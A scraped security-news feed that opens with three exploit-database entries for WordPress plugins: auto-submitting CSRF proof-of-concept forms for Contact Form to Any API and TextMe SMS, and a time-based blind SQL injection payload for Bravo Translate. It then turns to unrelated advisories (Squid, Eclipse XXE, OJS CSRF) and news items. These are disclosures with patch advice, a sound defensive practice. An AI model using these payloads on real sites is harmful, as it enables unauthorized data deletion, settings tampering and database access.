WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.6# Tested on: Windows, Linux# CVE: CVE-2023-47871# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.# Proof of Concept<html><body><form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST"><input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body></html># RecommendationUpgrade to version 1.1.7

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

WordPress Bravo Translate plugin versions 1.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/bravo-translate/# Version: 1.2# Tested on: Windows, Linux# CVE: CVE-2023-49161# Product DescriptionThis plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.# Vulnerability overview:The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=bAffected Parameter: textTopayload: test',(select%20sleep(5)))%23# RecommendationN/A

WordPress Bravo Translate 1.2 SQL Injection

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

Ubuntu Security Notice 6500-2 - USN-6500-1 fixed several vulnerabilities in Squid. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Joshua Rogers discovered that Squid incorrectly handled the Gopher protocol. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Gopher support has been disabled in this update.

==========================================================================  
Ubuntu Security Notice USN-6500-2  
December 11, 2023

squid3 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Squid.

Software Description:  
- squid3: Web proxy cache server

Details:

USN-6500-1 fixed several vulnerabilities in Squid. This update provides  
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

 Joshua Rogers discovered that Squid incorrectly handled the Gopher  
 protocol. A remote attacker could possibly use this issue to cause Squid to  
 crash, resulting in a denial of service. Gopher support has been disabled  
 in this update. (CVE-2023-46728)

 Joshua Rogers discovered that Squid incorrectly handled HTTP Digest  
 Authentication. A remote attacker could possibly use this issue to cause  
 Squid to crash, resulting in a denial of service. (CVE-2023-46847)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  squid                           3.5.27-1ubuntu1.14+esm1  
  squid3                          3.5.27-1ubuntu1.14+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  squid                           3.5.12-1ubuntu7.16+esm2  
  squid3                          3.5.12-1ubuntu7.16+esm2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6500-2  
  https://ubuntu.com/security/notices/USN-6500-1  
  CVE-2023-46728, CVE-2023-46847

Ubuntu Security Notice USN-6500-2

A message about extra delivery addresses getting added to Amazon accounts has gone wild on social media. Luckily, it's nothing to worry about.

Amazon customers have been seeing a message on social media that has caused some alarm.

Most of the posts look like one of these (depending on the social media platform):

> “PSA!! Amazon got hacked. For USA based people, check your Amazon account. Hackers added HUB lockers as your default delivery addresses. Remove it! I had 2 added to mine.”

Hub lockers are local secure places for people to pick up their Amazon order rather than risk them being left on a doorstep, so the concern was that someone could buy something on your account and then send it to the Hub locker to be picked up.

Here’s another similar post, this time saying the lockers were actually fake:

> “PSA: check your saved addresses on Amazon. Amazon got hacked and a lot of people (including me) have random “Amazon lockers” saved in their addresses – which are not actual lockers. If you do use Amazon lockers, be sure to verify that the locker you’re sending it to is an actual locker.
> 
> Double check your order history and make sure there aren’t any orders you don’t recognize. And check your bank accounts to make sure your credit card on file is also not being used for unauthorized purchases. “

It’s not surprising that those messages would raise the alarm amongst Amazon’s customers, but thankfully the security alert is nothing to worry about.

The additional addresses are genuine Hub locations or other pick-up locations and they weren’t put there by hackers. Amazon added them in error.

As an Amazon spokesperson told Snopes:

> This isn’t a data security matter and our systems are secure. Amazon pickup locations were added to a small number of customer accounts in error, and we are working to fix the issue. We apologize for any inconvenience this may have caused, and customers with questions about their account are welcome to contact customer service.

Things like this are tricky – on the one hand we are always pleased for people to share security issues and alert others to potential problems. However in this case it appears as though people were forwarding the message without first checking if it was, in fact, a real issue.

And nowadays with social media and instant messaging, rumours like these can spread fast. All it takes is some panic, little research, and a lot of contacts.

If you see a message like this, always do a bit of research before forwarding it on. Sites like Snopes allow you to search for keywords and you’ll find a lot of hoaxes including this one.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 &#8220;Amazon got hacked&#8221; messages are a false alarm 

In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit
document type definition (DTD) references to external entities.
This means that if a user chooses to use a malicious report definition XML file containing an external entity reference
to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.


Skip to content

**XXE in Eclipse Memory Analyzer report definition files**

The Eclipse Foundation is a Common Vulnerabilities and Exposures (CVE) Numbering Authority. This issue it used to request and track the progress of the assignment of a CVE for a vulnerability in the project code for an Eclipse open source project.

**Basic information**

**Project name:** Eclipse Memory Analyzer

**Project id:** tools.mat

**Request type:** reservation

**Versions affected:** \[0.7, 1.14.0\]

**Common Weakness Enumeration:**

*   CWE-611

**Common Vulnerability Scoring System:** 3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L/E:U/RL:W/RC:C/CR:X/IR:X/AR:X/MAV:L/MAC:L/MPR:L/MUI:R/MS:U/MC:L/MI:N/MA:L

**Summary:**

In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.

**Workaround:**

A workaround for Eclipse Memory Analyzer 1.14.0 and earlier is to run MAT with the following system properties set in MemoryAnalyzer.ini

    -Djavax.xml.accessExternalSchema=
    -Djavax.xml.accessExternalDTD=

**Links:**

*   https://bugs.eclipse.org/bugs/show\_bug.cgi?id=582631
*   vulnerability-reports#169 (closed)

**Tracking**

**This section will completed by the project team**.

*   Reserve an entry only
*   We're ready for this issue to be reported to the central authority (i.e., make this public now)

Note that for those projects that host their repositories on GitHub, the use of GitHub Security Advisories is recommended but is not required.

**This section will be completed by the EMO**.

**CVE:** {cve}

*   All required information is provided
*   CVE Assigned
*   Pushed to Mitre

Edited Dec 11, 2023 by Marta Rybczynska

CVE-2023-6194: XXE in Eclipse Memory Analyzer report definition files (#15) · Issues · Eclipse Projects Security / cve-assignement · GitLab

A vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

Affected Resources

OPEN JOURNAL SYSTEMS, version 3.3.0.13.

Description

INCIBE has coordinated the publication of a vulnerability affecting OJS (OPEN JOURNAL SYSTEMS), an open source solution for the management and publication of online academic journals, in its version 3.3.0.13, which has been discovered by David Cámara Galindo, from Telefónica Tech.

This vulnerability has been assigned the following code, CVSS v3.1 base score, CVSS vector and vulnerability type CWE:

*   CVE-2023-6671: CVSS v3.1: 6.3 | CVSS: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L | CWE-352.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-6671**: a vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

CVE-2023-6671: Cross-Site Request Forgery on OPEN JOURNAL SYSTEMS

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

By Deeba Ahmed
Operation Storm Makers II, as dubbed by Interpol, witnessed the mobilization of law enforcement agencies from 27 countries.
This is a post from HackRead.com Read the original post: Interpol Busts Human Traffickers Luring Victims with Fake Online Job Ads

The operation covered a range of cyber scam cases, including 40 Malaysian victims lured to Peru for a high-paying job, and several citizens taken to Dubai for employment before being diverted to Thailand and Myanmar.

The **Interpol** operation targeting human trafficking-fueled fraud, named Operation Storm Makers II, has uncovered that crimes are spreading beyond Southeast Asia. This global initiative is designed to combat human trafficking and migrant smuggling, shedding light on the intricate network of cyber scams. Law enforcement agencies from 27 countries were mobilized for this operation.

Interpol’s efforts have generated significant results, leading to the arrest of 281 individuals involved in a range of offences, including human trafficking, passport forgery, corruption, telecommunications fraud, and sexual exploitation. Additionally, authorities have successfully rescued 149 victims through over 360 investigations, with some still ongoing.

The operation covered a range of cyber scam cases, including 40 Malaysian victims lured to Peru for a high-paying job, and several citizens taken to Dubai for employment before being diverted to Thailand and Myanmar. It involved over 270,000 inspections and police checks at 450 human trafficking global hotspots between 16 and 20 October.

Investigators found that increasing cyber fraud schemes involving fake crypto investments, work-from-home, lottery and online gambling scams are encouraging human trafficking globally. Victims are often trafficked to cyber scam centers, where they are lured through **fake job ads** and forced to commit online fraud.

It is worth noting that earlier this year, Interpol shut down a notorious phishing-as-a-service platform called **16shop** involved in the sale of ‘phishing kits’ to hackers to scam internet users. 

In a **press release**, Interpol’s assistant director of vulnerable communities, Rosemary Nalubega, stated that the human cost of cyber scams is continually rising and the only productive option to tackle it is concerted global action. Operation Storm Makers II has proven effective in diverting law enforcement’s attention towards cyber scams.

In India, police registered one of their first cases of human trafficking through cyber fraud whereas in Myanmar since 2022, authorities have reported rescuing trafficking victims from 22 countries, mainly from Kayin and Shan States.

Apart from the cyber scam centres, Operation Storm Makers II revealed other human trafficking and migrant smuggling offences. A 13-year-old boy from Bangladesh, who was trafficked to India, has been rescued. Two female victims from Nepal were rescued from India and sent home.

Turkish law enforcement caught 239 migrant smugglers while patrolling the country’s coastline, and intercepted around 4,000 irregular migrants. The operation also focuses on prevention, and member countries have rolled out awareness campaigns to help potential victims avoid being trafficked.

Participating countries include Angola, Australia, Bangladesh, Brazil, Cambodia, China, Ethiopia, Ghana, India, Indonesia, Kazakhstan, Kenya, Laos, Malaysia, Myanmar, Nepal, Pakistan, Philippines, Singapore, South Africa, Sri Lanka, Tanzania, Thailand, Turkey, Uganda, United Arab Emirates, and Vietnam.

**William Wright**, CEO of Closed Door Security endorsed Interpol’s work. In a statement to Hackread.com, Wright said “The latest announcement from Interpol highlights how the whole criminal ecosystem is becoming increasingly interlinked. Now we are seeing people being trafficked and forced to commit cyber fraud, which links two of the biggest underworld industries. Gangs are now resorting to kidnapping to force people to carry out fraud, which also shows just how far beyond digital cybercrime has become today.”

Wright warned that despite the large-scale operation and its success, there is much more to be done. “The update highlights just how many scam centres are in operation today, but the numbers announced by Interpol are a drop in the ocean in comparison to the reality,” he added.

“To fight back against these horrible crimes, we need to see more collaboration from law enforcement across the world, where data is shared, and criminals are publicly sanctioned. We must also make consumers more aware of these scams, so they are better educated to recognise them and ignore them, before clicking on a malicious link or handing over their confidential information. Doing this will have a knock-on effect on scam centre profits, which will significantly hurt the criminals behind them,”  Wright warned.

1.  **EMPACT Hackathon Targets Online Human Traffickers**
2.  **Utilizing Programmatic Advertising to Locate Abducted Children**
3.  **Operation Narsil – INTERPOL Busts Decade-Old Child Abuse Network**
4.  **Anonymous Hacks Thailand Senate Website against Human Trafficking**
5.  **DARPA Builds ‘Memex’ Deep Web Search Engine to Track Sex Traffickers**
6.  **US seizes classified advertising website Backpageover human trafficking**
7.  **Senior OPERA1ER Cybercrime Gang Member Arrested in Global Operation**

Interpol Busts Human Traffickers Luring Victims with Fake Online Job Ads

Malwarebytes is offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture

Every day, nearly 70 brand-new vulnerabilities are discovered in software products around the world. That’s almost 25,550 new problems each year, of which roughly 4,250 (or every one-in-six) will be classified as “critical.”

But with little guidance beyond “critical” classifications—and with the potential for non-critical vulnerabilities to still be exploited for devastating malware attacks—resource-constrained IT organizations need help. How can IT teams prioritize amongst potentially thousands of vulnerabilities if they don’t know which to fix first?

Malwarebytes analyzed the vulnerabilities identified by its ThreatDown Vulnerability Assessment module, now included at no additional cost in all ThreaDown bundles, to reveal the most common “critical” and “important” unpatched vulnerabilities on known endpoints.

The vulnerabilities compiled show up across four major software products:

*   Adobe Flash Player
*   Adobe Acrobat Reader
*   VideoLan VLC Media Player
*   Zoom

****The most prevalent vulnerabilities:****

In the 100 most prevalent unpatched vulnerabilities, the majority **(93 out of the 100) are found in software by Adobe, Zoom, and Mozilla.** \[MOU3\] 

No vulnerability listed as critical made it into the top 100 most prevalent vulnerabilities. But one critical vulnerability was close: CVE-2020-9633 in Adobe Flash Player. The vulnerable version of Flash is still in use because Adobe silently introduced a time bomb in later Flash Player versions that would prevent Flash Player from working and playing any Flash content after January 12, 2021. So organizations that have certain Flash content they need to play often to go back to that vulnerable version.

Relatedly, the most prevalent vulnerabilities labeled “Critical” come from a more diverse group of software vendors, with four distinct top contributors:

*   30 % UltraVNC (Server and Viewer)
*   20 % Python (versions 3.6 to 3.10)
*   18% Microsoft (Edge and Visual Studio)
*   14 % Adobe (Flash Player, Acrobat, and Reader)

Read on to see details of the top 5 unpatched critical vulnerabilities and the top 5 unpatched important vulnerabilities, as uncovered by ThreatDown, powered by Malwarebytes.

****The top 5 unpatched CRITICAL vulnerabilities:****

**Adobe Flash Player**

CVE-2020-9633: Adobe Flash Player Desktop Runtime 32.0.0.371 and earlier, Adobe Flash Player for Google Chrome 32.0.0.371 and earlier, and Adobe Flash Player for Microsoft Edge and Internet Explorer 32.0.0.330 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution. Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS.

**Zoom:**

CVE-2022-22785: The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly constrain client session cookies to Zoom domains. This issue could be used in a more sophisticated attack to send an unsuspecting users Zoom-scoped session cookies to a non-Zoom domain. This could potentially allow for spoofing of a Zoom user.

CVE-2022-22786: The Zoom Client for Meetings for Windows before version 5.10.0 and Zoom Rooms for Conference Room for Windows before version 5.10.0, fails to properly check the installation version during the update process. This issue could be used in a more sophisticated attack to trick a user into downgrading their Zoom client to a less secure version.

**Adobe Acrobat Reader**

CVE-2016-1038: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

CVE-2016-1044: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

****The top 5 unpatched IMPORTANT vulnerabilities:****

**Zoom:**

CVE-2023-39211: Improper privilege management in Zoom Desktop Client for Windows and Zoom Rooms for Windows may allow an authenticated user to enable an information disclosure via local access. Upgrading to 5.15.5 or later eliminates this vulnerability.

CVE-2023-34116: Improper input validation in the Zoom Desktop Client for Windows may allow an unauthorized user to enable an escalation of privilege via network access. Upgrading to version 5.15.0 or later eliminates this vulnerability.

CVE-2023-39213: Improper neutralization of special elements in Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to enable an escalation of privilege via network access. Upgrading to version 5.15.2 or later eliminates this vulnerability.

**Adobe:**

CVE-2023-29320: Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an Violation of Secure Design Principles vulnerability that could result in arbitrary code execution in the context of the current user by bypassing the API blacklisting feature. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Updating to the latest version eliminates the vulnerability.

**VLC media player**

CVE-2020-26664: A vulnerability in VideoLAN VLC media player 3.0.11 allows attackers to trigger a heap-based buffer overflow via a specially crafted file. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap. A buffer overflow may result in arbitrary code execution. Installing the 3.0.20 release of VLC eliminates the vulnerability.

**You Can’t Fix What You Can’t See**

While only on very rare occasions do vulnerabilities make mainstream news headlines, but when they do, the impact can be enormous. The exploitation of the MOVEit vulnerability by Cl0p ransomware operators impacted over 60 million individual victims (between May and September of 2023. And remember that not every “critical” vulnerability is synonymous with an exploited vulnerability. With an additional 1,000 entries added to CISA’s known, exploited vulnerabilities catalog in just the past two years, few organizations have the IT staff to keep track of everything.

Many organizations only have limited visibility into which vulnerabilities might impact them, and nearly every organization relies on the Common Vulnerabilities and Exposures (CVE) database, which lists publicly disclosed computer security flaws. But this isn’t a perfect resource.

In 2023, CVE-2023-4863 was discovered, originally described as a heap buffer overflow in WebP  within Google Chrome. The average person, upon learning about this vulnerability, may have thought that the problem was limited to Chrome, or maybe even realize that other Chromium based browsers could be affected. Yet the reality was quite different. It turned out that the bug was deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images. So anyone that patched their Chrome browser might think they thwarted that vulnerability, when in reality they might still be vulnerable, just in different software.

This type of library oversight happens quite often. Most people, including thoroughly trained and experienced IT staff, have no idea about all the building blocks that were used to create the environment and software that they use.

This is where dedicated software to alert staff about existing vulnerabilities in their environment integrated with patch management capabilities can help save the day.

**Free Vulnerability Assessment**

Today Malwarebytes announced its offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture. The full featured comprehensive vulnerability scanning is now included in every ThreatDown Bundle at no additional cost via its integrated console.

Learn more about how ThreatDown bundles can help you to improve your security by quickly finding and fixing vulnerabilities here.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

Tag

#auth